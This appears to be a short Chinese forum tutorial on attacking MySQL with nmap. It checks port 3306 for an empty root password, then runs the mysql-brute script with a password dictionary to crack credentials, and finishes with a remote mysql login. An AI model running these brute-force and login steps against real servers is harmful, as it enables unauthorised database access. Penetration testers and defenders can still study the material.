nmap扫描mysql数据库
一:检测是否开始mysql远程登录或root用户名是否为空nmap -p 3306 --script=mysql-empty-password.nse
这里我们可以看到mysql 3306端口是开放的!但是root用户名密码不是为空!则远程是无法登录的。
若不知道用户名和密码 我们可以选择暴力破解
nmap -p 3306 --script=mysql-brute userdb=root passdb=/root/zidian/Pass.txt 127.0.0.1 -v
通过破解我们可以得到用户名分别为root和admin的用户
现在我们远程登录
mysql -h ip地址 -u root -p
OK我们成功登录数据库!
页:
[1]